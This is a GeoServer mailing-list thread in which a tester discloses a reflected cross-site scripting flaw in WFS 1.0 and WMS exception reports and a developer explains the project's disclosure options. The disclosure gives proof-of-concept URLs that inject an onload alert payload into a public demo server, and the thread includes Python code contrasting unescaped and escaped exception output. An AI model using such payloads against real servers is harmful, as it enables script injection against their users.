Hi,
Ok, the open source way is fine with me.
During a security test we discovered that there is a potential XSS (Cross site 
scripting) flaw in the generation of service exceptions in (some) WMS and WFS 
services of Geoserver 2.4.x. I haven't been able to test using Geoserver 2.5, 
perhaps the flaw is fixed? Please let me know if so.
WFS Proof of concept:
WFS 1.0 PoC: 
http://demo.opengeo.org/geoserver/ows?SERVICE=WFS&request=";><a%20xmlns:a=%27http://www.w3.org/1999/xhtml%27><a:body%20onload="alert%28%27xss%27%29"/></a><"&VERSION=1.0<http://demo.opengeo.org/geoserver/ows?SERVICE=WFS&request=%22%3e%3ca%20xmlns:a=%27http://www.w3.org/1999/xhtml%27%3e%3ca:body%20onload=%22alert%28%27xss%27%29%22/%3e%3c/a%3e%3c%22&VERSION=1.0>

If I remove the version info, or use WFS version=2.0, the service exception is 
encoded properly, and no injection is possible:
WFS (without version): 
http://demo.opengeo.org/geoserver/ows?SERVICE=WFS&request=";><a%20xmlns:a=%27http://www.w3.org/1999/xhtml%27><a:body%20onload="alert%28%27xss%27%29"/></a><"

The WMS service behaves differently. Using no version (or version 1.3.0), the 
XSS is “successful”. Using 1.1.1 version the content-type response header is 
set to application/vnd.ogc.se_xml, hence no execution in the browser.
WMS Proof of concept:
WMS (without version): 
http://demo.opengeo.org/geoserver/ows?SERVICE=WMS&request=";><a%20xmlns:a=%27http://www.w3.org/1999/xhtml%27><a:body%20onload="alert%28%27xss%27%29"/></a><"

Using version 1.1.1 sets the content-type header to application/vnd.ogc.se_xml:
WMS (version 1.1.1): 
http://demo.opengeo.org/geoserver/ows?SERVICE=WMS&request=";><a%20xmlns:a=%27http://www.w3.org/1999/xhtml%27><a:body%20onload="alert%28%27xss%27%29"/></a><"&version=1.1.<http://demo.opengeo.org/geoserver/ows?SERVICE=WMS&request=%22%3e%3ca%20xmlns:a=%27http://www.w3.org/1999/xhtml%27%3e%3ca:body%20onload=%22alert%28%27xss%27%29%22/%3e%3c/a%3e%3c%22&version=1.1.>1

It seems to me that the correct handling of service exceptions is implemented in 
the WFS 2.0 “handler”; is it possible to update the source of the others to 
behave similarly?

Regards
Mats
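
As an added illustration (not GeoServer's code), a small Python model of the two behaviours contrasted in the report: an exception writer that reflects the request parameter raw, beside one that XML-escapes it and answers with the OGC exception MIME type, plus a check a tester can run over a captured response body. The report template, the probe value and the text/xml type for the unsafe case are constructed assumptions.

```python
from xml.sax.saxutils import escape
import xml.etree.ElementTree as ET

# MIME type the report observes for WMS 1.1.1 exceptions (browsers do not render it).
OGC_SE_XML = "application/vnd.ogc.se_xml"

# Constructed report skeleton; {value} is where the unknown request name is echoed.
TEMPLATE = (
    '<ServiceExceptionReport version="1.2.0">\n'
    '  <ServiceException code="InvalidParameterValue" locator="request">'
    "Unknown request: {value}</ServiceException>\n"
    "</ServiceExceptionReport>\n"
)

# Constructed, inert probe: a namespaced XHTML element, like the one in the report.
PROBE = '<x:p xmlns:x="http://www.w3.org/1999/xhtml"/>'


def unsafe_report(request_value):
    """Interpolates the raw parameter: the behaviour reported for WFS 1.0 / WMS 1.3.0.
    Content type text/xml is an assumption for the unsafe case."""
    return "text/xml", TEMPLATE.format(value=request_value)


def safe_report(request_value):
    """Escape &, <, > and both quote characters before embedding the value,
    and send the OGC exception MIME type instead of a browser-renderable one."""
    safe = escape(request_value, {'"': "&quot;", "'": "&apos;"})
    return OGC_SE_XML, TEMPLATE.format(value=safe)


def reflects_markup(body):
    """Defender-side check on a response body: True when the echoed value
    survived as live markup. A correct report carries the value as text only,
    so ServiceException must have no child elements; a body that no longer
    parses means the injected characters broke the XML, also a failure."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return True
    return any(len(se) > 0 for se in root.iter("ServiceException"))


if __name__ == "__main__":
    for builder in (unsafe_report, safe_report):
        ctype, body = builder(PROBE)
        print(builder.__name__, ctype, "reflects markup:", reflects_markup(body))
```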

From: [email protected] [mailto:[email protected]] On behalf of Andrea Aime
Sent: 9 May 2014 14:09
To: Isakson Mats
Cc: [email protected]
Subject: Re: [Geoserver-users] Handling of a detected security flaw

On Fri, May 9, 2014 at 1:32 PM, Isakson Mats <[email protected]> wrote:
Hi,
In general, how do you handle potential security flaws? Do we discuss the 
potential flaw here on the mailing list?

There are two possible mechanisms:
* the open source way, in the open, on the mailing list
* the commercial way, in private, with a commercial support provider

It would be nice to have a "free but private" way; to do that we'd need some 
staff that has paid time to look at these issues from e.g., a foundation of 
sorts, but that's not something we have available (or that was ever discussed)

Cheers
Andrea

--
==
Meet us at GEO Business 2014! in London! Visit http://goo.gl/fES3aK
for more information.
==

Ing. Andrea Aime
@geowolf
Technical Lead

GeoSolutions S.A.S.
Via Poggio alle Viti 1187
55054  Massarosa (LU)
Italy
phone: +39 0584 962313
fax: +39 0584 1660272
mob: +39  339 8844549

http://www.geo-solutions.it
http://twitter.com/geosolutions_it

_______________________________________________
Geoserver-users mailing list
[email protected]
https://lists.sourceforge.net/lists/listinfo/geoserver-users